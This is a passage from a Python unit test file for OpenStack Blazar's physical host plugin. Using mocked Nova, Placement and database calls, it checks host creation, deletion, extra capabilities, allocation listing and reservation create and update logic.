self.cfg.config(os_admin_project_domain_name='fake-pj-domain')
self.context = context
self.patch(self.context, 'BlazarContext')
self.patch(base, 'url_for').return_value = 'http://foo.bar'
self.host_plugin = host_plugin
self.fake_phys_plugin = self.host_plugin.PhysicalHostPlugin()
self.nova = nova
self.rp_create = self.patch(self.nova.ReservationPool, 'create')
self.db_api = db_api
self.db_host_extra_capability_get_all_per_host = (
self.patch(self.db_api, 'host_extra_capability_get_all_per_host'))
def test_configuration(self):
self.assertEqual("fake-user", self.fake_phys_plugin.username)
self.assertEqual("fake-passwd", self.fake_phys_plugin.password)
self.assertEqual("fake-user-domain",
self.fake_phys_plugin.user_domain_name)
self.assertEqual("fake-pj-name", self.fake_phys_plugin.project_name)
self.assertEqual("fake-pj-domain",
self.fake_phys_plugin.project_domain_name)
def test__get_extra_capabilities_with_values(self):
self.db_host_extra_capability_get_all_per_host.return_value = [
{'id': 1,
'capability_name': 'foo',
'capability_value': 'bar',
'other': 'value',
'computehost_id': 1
},
{'id': 2,
'capability_name': 'buzz',
'capability_value': 'word',
'computehost_id': 1
}]
res = self.fake_phys_plugin._get_extra_capabilities(1)
self.assertEqual({'foo': 'bar', 'buzz': 'word'}, res)
def test__get_extra_capabilities_with_no_capabilities(self):
self.db_host_extra_capability_get_all_per_host.return_value = []
res = self.fake_phys_plugin._get_extra_capabilities(1)
self.assertEqual({}, res)
@ddt.ddt
class PhysicalHostPluginTestCase(tests.TestCase):
def setUp(self):
super(PhysicalHostPluginTestCase, self).setUp()
self.cfg = cfg
self.context = context
self.patch(self.context, 'BlazarContext')
self.nova_client = nova_client
self.nova_client = self.patch(self.nova_client, 'Client').return_value
self.service = service
self.manager = self.service.ManagerService()
self.fake_host_id = '1'
self.fake_host = {
'id': self.fake_host_id,
'hypervisor_hostname': 'hypvsr1',
'service_name': 'compute1',
'vcpus': 4,
'cpu_info': 'foo',
'hypervisor_type': 'xen',
'hypervisor_version': 1,
'memory_mb': 8192,
'local_gb': 10,
'trust_id': 'exxee111qwwwwe',
}
self.patch(base, 'url_for').return_value = 'http://foo.bar'
self.host_plugin = host_plugin
self.fake_phys_plugin = self.host_plugin.PhysicalHostPlugin()
self.db_api = db_api
self.db_utils = db_utils
self.db_host_get = self.patch(self.db_api, 'host_get')
self.db_host_get.return_value = self.fake_host
self.db_host_list = self.patch(self.db_api, 'host_list')
self.db_host_create = self.patch(self.db_api, 'host_create')
self.db_host_update = self.patch(self.db_api, 'host_update')
self.db_host_destroy = self.patch(self.db_api, 'host_destroy')
self.db_host_extra_capability_get_all_per_host = self.patch(
self.db_api, 'host_extra_capability_get_all_per_host')
self.db_host_extra_capability_get_all_per_name = self.patch(
self.db_api, 'host_extra_capability_get_all_per_name')
self.db_host_extra_capability_create = self.patch(
self.db_api, 'host_extra_capability_create')
self.db_host_extra_capability_update = self.patch(
self.db_api, 'host_extra_capability_update')
self.nova = nova
self.rp_create = self.patch(self.nova.ReservationPool, 'create')
self.patch(self.nova.ReservationPool, 'get_aggregate_from_name_or_id')
self.add_compute_host = self.patch(self.nova.ReservationPool,
'add_computehost')
self.remove_compute_host = self.patch(self.nova.ReservationPool,
'remove_computehost')
self.get_host_details = self.patch(self.nova.NovaInventory,
'get_host_details')
self.get_host_details.return_value = self.fake_host
self.get_servers_per_host = self.patch(
self.nova.NovaInventory, 'get_servers_per_host')
self.get_servers_per_host.return_value = None
self.get_extra_capabilities = self.patch(
self.fake_phys_plugin, '_get_extra_capabilities')
self.get_extra_capabilities.return_value = {
'foo': 'bar',
'buzz': 'word',
}
self.placement = placement
self.prov_create = self.patch(self.placement.BlazarPlacementClient,
'create_reservation_provider')
self.prov_create.return_value = {
"generation": 0,
"name": "blazar_foo",
"uuid": "7d2590ae-fb85-4080-9306-058b4c915e3f",
"parent_provider_uuid": "542df8ed-9be2-49b9-b4db-6d3183ff8ec8",
"root_provider_uuid": "542df8ed-9be2-49b9-b4db-6d3183ff8ec8"
}
self.prov_delete = self.patch(self.placement.BlazarPlacementClient,
'delete_reservation_provider')
self.fake_phys_plugin.setup(None)
self.trusts = trusts
self.trust_ctx = self.patch(self.trusts, 'create_ctx_from_trust')
self.trust_create = self.patch(self.trusts, 'create_trust')
self.ServerManager = nova.ServerManager
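    # The patches above stub out the Nova, Placement, trusts and DB layers so the
    # tests below drive PhysicalHostPlugin purely through mocks: self.fake_host
    # stands in for a hypervisor record, and 'count_range' strings such as '1-1'
    # encode the reservation's "min-max" host count.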
def test_get_host(self):
host = self.fake_phys_plugin.get_computehost(self.fake_host_id)
self.db_host_get.assert_called_once_with('1')
expected = self.fake_host.copy()
expected.update({'foo': 'bar', 'buzz': 'word'})
self.assertEqual(expected, host)
def test_get_host_without_extracapabilities(self):
self.get_extra_capabilities.return_value = {}
host = self.fake_phys_plugin.get_computehost(self.fake_host_id)
self.db_host_get.assert_called_once_with('1')
self.assertEqual(self.fake_host, host)
@testtools.skip('incorrect decorator')
def test_list_hosts(self):
self.fake_phys_plugin.list_computehosts({})
self.db_host_list.assert_called_once_with()
del self.service_utils
def test_create_host_without_extra_capabilities(self):
self.get_extra_capabilities.return_value = {}
host = self.fake_phys_plugin.create_computehost(self.fake_host)
self.db_host_create.assert_called_once_with(self.fake_host)
self.prov_create.assert_called_once_with('hypvsr1')
self.assertEqual(self.fake_host, host)
def test_create_host_with_extra_capabilities(self):
fake_host = self.fake_host.copy()
fake_host.update({'foo': 'bar'})
# NOTE(sbauza): 'id' will be pop'd, we need to keep track of it
fake_request = fake_host.copy()
fake_capa = {'computehost_id': '1',
'capability_name': 'foo',
'capability_value': 'bar',
}
self.get_extra_capabilities.return_value = {'foo': 'bar'}
self.db_host_create.return_value = self.fake_host
host = self.fake_phys_plugin.create_computehost(fake_request)
self.db_host_create.assert_called_once_with(self.fake_host)
self.prov_create.assert_called_once_with('hypvsr1')
self.db_host_extra_capability_create.assert_called_once_with(fake_capa)
self.assertEqual(fake_host, host)
def test_create_host_with_capabilities_too_long(self):
fake_host = self.fake_host.copy()
fake_host.update({'foo': 'bar'})
# NOTE(sbauza): 'id' will be pop'd, we need to keep track of it
fake_request = fake_host.copy()
long_key = ""
for i in range(65):
long_key += "0"
fake_request[long_key] = "foo"
self.assertRaises(manager_exceptions.ExtraCapabilityTooLong,
self.fake_phys_plugin.create_computehost,
fake_request)
def test_create_host_without_trust_id(self):
self.assertRaises(manager_exceptions.MissingTrustId,
self.fake_phys_plugin.create_computehost, {})
def test_create_host_without_host_id(self):
self.assertRaises(manager_exceptions.InvalidHost,
self.fake_phys_plugin.create_computehost,
{'trust_id': 'exxee111qwwwwe'})
def test_create_host_with_existing_vms(self):
self.get_servers_per_host.return_value = ['server1', 'server2']
self.assertRaises(manager_exceptions.HostHavingServers,
self.fake_phys_plugin.create_computehost,
self.fake_host)
def test_create_host_issuing_rollback(self):
def fake_db_host_create(*args, **kwargs):
raise db_exceptions.BlazarDBException
self.db_host_create.side_effect = fake_db_host_create
self.assertRaises(db_exceptions.BlazarDBException,
self.fake_phys_plugin.create_computehost,
self.fake_host)
self.prov_create.assert_called_once_with('hypvsr1')
self.prov_delete.assert_called_once_with('hypvsr1')
def test_create_host_having_issue_when_storing_extra_capability(self):
def fake_db_host_extra_capability_create(*args, **kwargs):
raise db_exceptions.BlazarDBException
fake_host = self.fake_host.copy()
fake_host.update({'foo': 'bar'})
fake_request = fake_host.copy()
self.get_extra_capabilities.return_value = {'foo': 'bar'}
self.db_host_create.return_value = self.fake_host
fake = self.db_host_extra_capability_create
fake.side_effect = fake_db_host_extra_capability_create
self.assertRaises(manager_exceptions.CantAddExtraCapability,
self.fake_phys_plugin.create_computehost,
fake_request)
def test_update_host(self):
host_values = {'foo': 'baz'}
self.db_host_extra_capability_get_all_per_name.return_value = [
{'id': 'extra_id1',
'computehost_id': self.fake_host_id,
'capability_name': 'foo',
'capability_value': 'bar'
},
]
self.get_reservations_by_host = self.patch(
self.db_utils, 'get_reservations_by_host_id')
self.get_reservations_by_host.return_value = []
self.fake_phys_plugin.update_computehost(self.fake_host_id,
host_values)
self.db_host_extra_capability_update.assert_called_once_with(
'extra_id1', {'capability_name': 'foo', 'capability_value': 'baz'})
def test_update_host_having_issue_when_storing_extra_capability(self):
def fake_db_host_extra_capability_update(*args, **kwargs):
raise RuntimeError
host_values = {'foo': 'baz'}
self.get_reservations_by_host = self.patch(
self.db_utils, 'get_reservations_by_host_id')
self.get_reservations_by_host.return_value = []
self.db_host_extra_capability_get_all_per_name.return_value = [
{'id': 'extra_id1',
'computehost_id': self.fake_host_id,
'capability_name': 'foo',
'capability_value': 'bar'
},
]
fake = self.db_host_extra_capability_update
fake.side_effect = fake_db_host_extra_capability_update
self.assertRaises(manager_exceptions.CantAddExtraCapability,
self.fake_phys_plugin.update_computehost,
self.fake_host_id, host_values)
def test_update_host_with_new_extra_capability(self):
host_values = {'qux': 'word'}
self.db_host_extra_capability_get_all_per_host.return_value = []
self.fake_phys_plugin.update_computehost(self.fake_host_id,
host_values)
self.db_host_extra_capability_create.assert_called_once_with({
'computehost_id': '1',
'capability_name': 'qux',
'capability_value': 'word'
})
def test_update_host_with_used_capability(self):
host_values = {'foo': 'buzz'}
self.db_host_extra_capability_get_all_per_name.return_value = [
{'id': 'extra_id1',
'computehost_id': self.fake_host_id,
'capability_name': 'foo',
'capability_value': 'bar'
},
]
fake_phys_reservation = {
'resource_type': plugin.RESOURCE_TYPE,
'resource_id': 'resource-1',
}
fake_get_reservations = self.patch(self.db_utils,
'get_reservations_by_host_id')
fake_get_reservations.return_value = [fake_phys_reservation]
fake_get_plugin_reservation = self.patch(self.db_utils,
'get_plugin_reservation')
fake_get_plugin_reservation.return_value = {
'resource_properties': '["==", "$foo", "bar"]'
}
self.assertRaises(manager_exceptions.CantAddExtraCapability,
self.fake_phys_plugin.update_computehost,
self.fake_host_id, host_values)
fake_get_plugin_reservation.assert_called_once_with(
plugin.RESOURCE_TYPE, 'resource-1')
def test_delete_host(self):
host_allocation_get_all = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = []
self.fake_phys_plugin.delete_computehost(self.fake_host_id)
self.db_host_destroy.assert_called_once_with(self.fake_host_id)
self.prov_delete.assert_called_once_with('hypvsr1')
self.get_servers_per_host.assert_called_once_with(
self.fake_host["hypervisor_hostname"])
def test_delete_host_reserved(self):
host_allocation_get_all = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': u'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': self.fake_host_id
}
]
self.assertRaises(manager_exceptions.CantDeleteHost,
self.fake_phys_plugin.delete_computehost,
self.fake_host_id)
def test_delete_host_having_vms(self):
host_allocation_get_all = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = []
self.get_servers_per_host.return_value = ['server1', 'server2']
self.assertRaises(manager_exceptions.HostHavingServers,
self.fake_phys_plugin.delete_computehost,
self.fake_host_id)
self.get_servers_per_host.assert_called_once_with(
self.fake_host["hypervisor_hostname"])
def test_delete_host_not_existing_in_db(self):
self.db_host_get.return_value = None
self.assertRaises(manager_exceptions.HostNotFound,
self.fake_phys_plugin.delete_computehost,
self.fake_host_id)
def test_delete_host_issuing_rollback(self):
def fake_db_host_destroy(*args, **kwargs):
raise db_exceptions.BlazarDBException
host_allocation_get_all = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = []
self.db_host_destroy.side_effect = fake_db_host_destroy
self.assertRaises(manager_exceptions.CantDeleteHost,
self.fake_phys_plugin.delete_computehost,
self.fake_host_id)
def test_list_allocations(self):
self.db_get_reserv_allocs = self.patch(
self.db_utils, 'get_reservation_allocations_by_host_ids')
# Expecting a list of (Reservation, Allocation)
self.db_get_reserv_allocs.return_value = [
('reservation-1', 'lease-1', 'host-1'),
('reservation-1', 'lease-1', 'host-2'),
('reservation-2', 'lease-1', 'host-2'),
('reservation-2', 'lease-1', 'host-3'),
('reservation-3', 'lease-2', 'host-1'),
]
expected = [
{
'resource_id': 'host-1',
'reservations': [
{'id': 'reservation-1', 'lease_id': 'lease-1'},
{'id': 'reservation-3', 'lease_id': 'lease-2'},
]
},
{
'resource_id': 'host-2',
'reservations': [
{'id': 'reservation-1', 'lease_id': 'lease-1'},
{'id': 'reservation-2', 'lease_id': 'lease-1'},
]
},
{
'resource_id': 'host-3',
'reservations': [
{'id': 'reservation-2', 'lease_id': 'lease-1'},
]
}
]
ret = self.fake_phys_plugin.list_allocations({})
# Sort returned value to use assertListEqual
for r in ret:
r['reservations'].sort(key=lambda x: x['id'])
ret.sort(key=lambda x: x['resource_id'])
self.assertListEqual(expected, ret)
def test_list_allocations_with_lease_id(self):
self.db_get_reserv_allocs = self.patch(
self.db_utils, 'get_reservation_allocations_by_host_ids')
# Expecting a list of (Reservation, Allocation)
self.db_get_reserv_allocs.return_value = [
('reservation-1', 'lease-1', 'host-1'),
('reservation-1', 'lease-1', 'host-2'),
('reservation-2', 'lease-1', 'host-2'),
('reservation-2', 'lease-1', 'host-3'),
]
expected = [
{
'resource_id': 'host-1',
'reservations': [
{'id': 'reservation-1', 'lease_id': 'lease-1'},
]
},
{
'resource_id': 'host-2',
'reservations': [
{'id': 'reservation-1', 'lease_id': 'lease-1'},
{'id': 'reservation-2', 'lease_id': 'lease-1'},
]
},
{
'resource_id': 'host-3',
'reservations': [
{'id': 'reservation-2', 'lease_id': 'lease-1'},
]
}
]
ret = self.fake_phys_plugin.list_allocations({'lease_id': 'lease-1'})
# Sort returned value to use assertListEqual
for r in ret:
r['reservations'].sort(key=lambda x: x['id'])
ret.sort(key=lambda x: x['resource_id'])
self.assertListEqual(expected, ret)
def test_list_allocations_with_reservation_id(self):
self.db_get_reserv_allocs = self.patch(
self.db_utils, 'get_reservation_allocations_by_host_ids')
# Expecting a list of (Reservation, Allocation)
self.db_get_reserv_allocs.return_value = [
('reservation-1', 'lease-1', 'host-1'),
('reservation-1', 'lease-1', 'host-2'),
]
expected = [
{
'resource_id': 'host-1',
'reservations': [
{'id': 'reservation-1', 'lease_id': 'lease-1'},
]
},
{
'resource_id': 'host-2',
'reservations': [
{'id': 'reservation-1', 'lease_id': 'lease-1'},
]
},
]
ret = self.fake_phys_plugin.list_allocations(
{'reservation_id': 'reservation-1'})
# Sort returned value to use assertListEqual
for r in ret:
r['reservations'].sort(key=lambda x: x['id'])
ret.sort(key=lambda x: x['resource_id'])
self.assertListEqual(expected, ret)
def test_get_allocations(self):
self.db_get_reserv_allocs = self.patch(
self.db_utils, 'get_reservation_allocations_by_host_ids')
# Expecting a list of (Reservation, Allocation)
self.db_get_reserv_allocs.return_value = [
('reservation-1', 'lease-1', 'host-1'),
('reservation-1', 'lease-1', 'host-2'),
('reservation-2', 'lease-1', 'host-2'),
('reservation-2', 'lease-1', 'host-3'),
('reservation-3', 'lease-2', 'host-1'),
]
expected = {
'resource_id': 'host-1',
'reservations': [
{'id': 'reservation-1', 'lease_id': 'lease-1'},
{'id': 'reservation-3', 'lease_id': 'lease-2'},
]
}
ret = self.fake_phys_plugin.get_allocations('host-1', {})
# sort returned value to use assertListEqual
ret['reservations'].sort(key=lambda x: x['id'])
self.assertDictEqual(expected, ret)
def test_get_allocations_with_lease_id(self):
self.db_get_reserv_allocs = self.patch(
self.db_utils, 'get_reservation_allocations_by_host_ids')
# Expecting a list of (Reservation, Allocation)
self.db_get_reserv_allocs.return_value = [
('reservation-1', 'lease-1', 'host-1'),
]
expected = {
'resource_id': 'host-1',
'reservations': [
{'id': 'reservation-1', 'lease_id': 'lease-1'},
]
}
ret = self.fake_phys_plugin.get_allocations('host-1',
{'lease_id': 'lease-1'})
# sort returned value to use assertListEqual
ret['reservations'].sort(key=lambda x: x['id'])
self.assertDictEqual(expected, ret)
def test_get_allocations_with_reservation_id(self):
self.db_get_reserv_allocs = self.patch(
self.db_utils, 'get_reservation_allocations_by_host_ids')
# Expecting a list of (Reservation, Allocation)
self.db_get_reserv_allocs.return_value = [
('reservation-1', 'lease-1', 'host-1'),
]
expected = {
'resource_id': 'host-1',
'reservations': [
{'id': 'reservation-1', 'lease_id': 'lease-1'},
]
}
ret = self.fake_phys_plugin.get_allocations(
'host-1', {'reservation_id': 'reservation-1'})
# sort returned value to use assertListEqual
ret['reservations'].sort(key=lambda x: x['id'])
self.assertDictEqual(expected, ret)
def test_get_allocations_with_invalid_host(self):
self.db_get_reserv_allocs = self.patch(
self.db_utils, 'get_reservation_allocations_by_host_ids')
# Expecting a list of (Reservation, Allocation)
self.db_get_reserv_allocs.return_value = [
('reservation-1', 'lease-1', 'host-1'),
('reservation-1', 'lease-1', 'host-2'),
('reservation-2', 'lease-1', 'host-2'),
('reservation-2', 'lease-1', 'host-3'),
('reservation-3', 'lease-2', 'host-1'),
]
expected = {'resource_id': 'no-reserved-host', 'reservations': []}
ret = self.fake_phys_plugin.get_allocations('no-reserved-host', {})
self.assertDictEqual(expected, ret)
def test_create_reservation_no_hosts_available(self):
now = datetime.datetime.utcnow()
values = {
'lease_id': u'018c1b43-e69e-4aef-a543-09681539cf4c',
'min': 1,
'max': 1,
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': '',
'start_date': now,
'end_date': now + datetime.timedelta(hours=1),
'resource_type': plugin.RESOURCE_TYPE,
}
host_reservation_create = self.patch(self.db_api,
'host_reservation_create')
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = []
self.assertRaises(manager_exceptions.NotEnoughHostsAvailable,
self.fake_phys_plugin.reserve_resource,
u'f9894fcf-e2ed-41e9-8a4c-92fac332608e',
values)
self.rp_create.assert_not_called()
host_reservation_create.assert_not_called()
def test_create_reservation_hosts_available(self):
values = {
'lease_id': u'018c1b43-e69e-4aef-a543-09681539cf4c',
'min': 1,
'max': 1,
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': '',
'start_date': datetime.datetime(2013, 12, 19, 20, 00),
'end_date': datetime.datetime(2013, 12, 19, 21, 00),
'resource_type': plugin.RESOURCE_TYPE,
}
self.rp_create.return_value = mock.MagicMock(id=1)
host_reservation_create = self.patch(self.db_api,
'host_reservation_create')
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = ['host1', 'host2']
host_allocation_create = self.patch(
self.db_api,
'host_allocation_create')
self.fake_phys_plugin.reserve_resource(
u'441c1476-9f8f-4700-9f30-cd9b6fef3509',
values)
host_values = {
'reservation_id': u'441c1476-9f8f-4700-9f30-cd9b6fef3509',
'aggregate_id': 1,
'resource_properties': '',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'count_range': '1-1',
'status': 'pending',
'before_end': 'default'
}
host_reservation_create.assert_called_once_with(host_values)
calls = [
mock.call(
{'compute_host_id': 'host1',
'reservation_id': u'441c1476-9f8f-4700-9f30-cd9b6fef3509',
}),
mock.call(
{'compute_host_id': 'host2',
'reservation_id': u'441c1476-9f8f-4700-9f30-cd9b6fef3509',
}),
]
host_allocation_create.assert_has_calls(calls)
@ddt.data("min", "max", "hypervisor_properties", "resource_properties")
def test_create_reservation_with_missing_param(self, missing_param):
values = {
'lease_id': u'018c1b43-e69e-4aef-a543-09681539cf4c',
'min': 1,
'max': 2,
'before_end': 'default',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': '',
'start_date': datetime.datetime(2017, 3, 1, 20, 00),
'end_date': datetime.datetime(2017, 3, 2, 20, 00),
'resource_type': plugin.RESOURCE_TYPE}
del values[missing_param]
self.assertRaises(
manager_exceptions.MissingParameter,
self.fake_phys_plugin.reserve_resource,
u'441c1476-9f8f-4700-9f30-cd9b6fef3509',
values)
@ddt.data({"params": {'max': 0}},
{"params": {'max': -1}},
{"params": {'max': 'one'}},
{"params": {'min': 0}},
{"params": {'min': -1}},
{"params": {'min': 'one'}},
{"params": {'before_end': 'invalid'}})
@ddt.unpack
def test_create_reservation_with_invalid_param(self, params):
values = {
'lease_id': u'018c1b43-e69e-4aef-a543-09681539cf4c',
'min': 1,
'max': 2,
'before_end': 'default',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': '',
'start_date': datetime.datetime(2017, 3, 1, 20, 00),
'end_date': datetime.datetime(2017, 3, 2, 20, 00),
'resource_type': plugin.RESOURCE_TYPE}
for key, value in params.items():
values[key] = value
self.assertRaises(
manager_exceptions.MalformedParameter,
self.fake_phys_plugin.reserve_resource,
u'441c1476-9f8f-4700-9f30-cd9b6fef3509',
values)
@ddt.data({"params": {'max': 0}},
{"params": {'max': -1}},
{"params": {'max': 'one'}},
{"params": {'min': 0}},
{"params": {'min': -1}},
{"params": {'min': 'one'}})
@ddt.unpack
def test_update_reservation_with_invalid_param(self, params):
values = {
'lease_id': u'018c1b43-e69e-4aef-a543-09681539cf4c',
'min': 1,
'max': 2,
'before_end': 'default',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': '',
'start_date': datetime.datetime(2017, 3, 1, 20, 00),
'end_date': datetime.datetime(2017, 3, 2, 20, 00),
'resource_type': plugin.RESOURCE_TYPE}
self.patch(self.db_api, 'reservation_get')
self.patch(self.db_api, 'lease_get')
host_reservation_get = self.patch(self.db_api,
'host_reservation_get')
host_reservation_get.return_value = {
'count_range': '1-1',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': ''
}
for key, value in params.items():
values[key] = value
self.assertRaises(
manager_exceptions.MalformedParameter,
self.fake_phys_plugin.update_reservation,
u'441c1476-9f8f-4700-9f30-cd9b6fef3509',
values)
def test_create_update_reservation_with_invalid_range(self):
values = {
'lease_id': u'018c1b43-e69e-4aef-a543-09681539cf4c',
'min': 2,
'max': 1,
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': '',
'start_date': datetime.datetime(2017, 3, 1, 20, 00),
'end_date': datetime.datetime(2017, 3, 2, 20, 00),
'resource_type': plugin.RESOURCE_TYPE,
}
self.patch(self.db_api, 'reservation_get')
self.patch(self.db_api, 'lease_get')
host_reservation_get = self.patch(self.db_api,
'host_reservation_get')
host_reservation_get.return_value = {
'count_range': '1-1',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': ''
}
self.assertRaises(
manager_exceptions.InvalidRange,
self.fake_phys_plugin.reserve_resource,
u'441c1476-9f8f-4700-9f30-cd9b6fef3509',
values)
self.assertRaises(
manager_exceptions.InvalidRange,
self.fake_phys_plugin.update_reservation,
u'441c1476-9f8f-4700-9f30-cd9b6fef3509',
values)
def test_update_reservation_shorten(self):
values = {
'start_date': datetime.datetime(2013, 12, 19, 20, 30),
'end_date': datetime.datetime(2013, 12, 19, 21, 00)
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': u'10870923-6d56-45c9-b592-f788053f5baa',
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2013, 12, 19, 20, 00),
'end_date': datetime.datetime(2013, 12, 19, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_reservation_get.assert_not_called()
def test_update_reservation_extend(self):
values = {
'start_date': datetime.datetime(2013, 12, 19, 20, 00),
'end_date': datetime.datetime(2013, 12, 19, 21, 30)
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': u'10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': u'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2013, 12, 19, 20, 00),
'end_date': datetime.datetime(2013, 12, 19, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'count_range': '1-1',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': u'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [{'id': 'host1'}]
get_reserved_periods = self.patch(self.db_utils,
'get_reserved_periods')
get_reserved_periods.return_value = [
(datetime.datetime(2013, 12, 19, 20, 00),
datetime.datetime(2013, 12, 19, 21, 00))
]
host_allocation_create = self.patch(
self.db_api,
'host_allocation_create')
host_allocation_destroy = self.patch(
self.db_api,
'host_allocation_destroy')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_allocation_create.assert_not_called()
host_allocation_destroy.assert_not_called()
def test_update_reservation_move_failure(self):
values = {
'start_date': datetime.datetime(2013, 12, 20, 20, 00),
'end_date': datetime.datetime(2013, 12, 20, 21, 30)
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': u'10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': u'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'active'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2013, 12, 19, 20, 00),
'end_date': datetime.datetime(2013, 12, 19, 21, 00)
}
host_reservation_get = self.patch(
self.db_api,
'host_reservation_get')
host_reservation_get.return_value = {
'count_range': '1-1',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': u'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [{'id': 'host1'}]
get_reserved_periods = self.patch(self.db_utils,
'get_reserved_periods')
get_reserved_periods.return_value = [
(datetime.datetime(2013, 12, 20, 20, 30),
datetime.datetime(2013, 12, 20, 21, 00))
]
get_computehosts = self.patch(self.nova.ReservationPool,
'get_computehosts')
get_computehosts.return_value = ['host1']
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = []
self.assertRaises(
manager_exceptions.NotEnoughHostsAvailable,
self.fake_phys_plugin.update_reservation,
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
reservation_get.assert_called()
def test_update_reservation_move_overlap(self):
values = {
'start_date': datetime.datetime(2013, 12, 19, 20, 30),
'end_date': datetime.datetime(2013, 12, 19, 21, 30)
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': u'10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': u'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2013, 12, 19, 20, 00),
'end_date': datetime.datetime(2013, 12, 19, 21, 00)
}
host_reservation_get = self.patch(
self.db_api,
'host_reservation_get')
host_reservation_get.return_value = {
'count_range': '1-1',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': u'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [{'id': 'host1'}]
get_reserved_periods = self.patch(self.db_utils,
'get_reserved_periods')
get_reserved_periods.return_value = [
(datetime.datetime(2013, 12, 19, 20, 30),
datetime.datetime(2013, 12, 19, 21, 00))
]
host_allocation_create = self.patch(
self.db_api,
'host_allocation_create')
host_allocation_destroy = self.patch(
self.db_api,
'host_allocation_destroy')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_allocation_create.assert_not_called()
host_allocation_destroy.assert_not_called()
def test_update_reservation_move_realloc(self):
values = {
'start_date': datetime.datetime(2013, 12, 20, 20, 00),
'end_date': datetime.datetime(2013, 12, 20, 21, 30)
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': u'10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': u'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2013, 12, 19, 20, 00),
'end_date': datetime.datetime(2013, 12, 19, 21, 00)
}
host_reservation_get = self.patch(
self.db_api,
'host_reservation_get')
host_reservation_get.return_value = {
'aggregate_id': 1,
'count_range': '1-1',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': u'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [{'id': 'host1'},
{'id': 'host2'}]
host_allocation_create = self.patch(
self.db_api,
'host_allocation_create')
host_allocation_destroy = self.patch(
self.db_api,
'host_allocation_destroy')
get_reserved_periods = self.patch(self.db_utils,
'get_reserved_periods')
get_reserved_periods.return_value = [
(datetime.datetime(2013, 12, 20, 20, 30),
datetime.datetime(2013, 12, 20, 21, 00))
]
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = ['host2']
self.fake_phys_plugin.update_reservation(
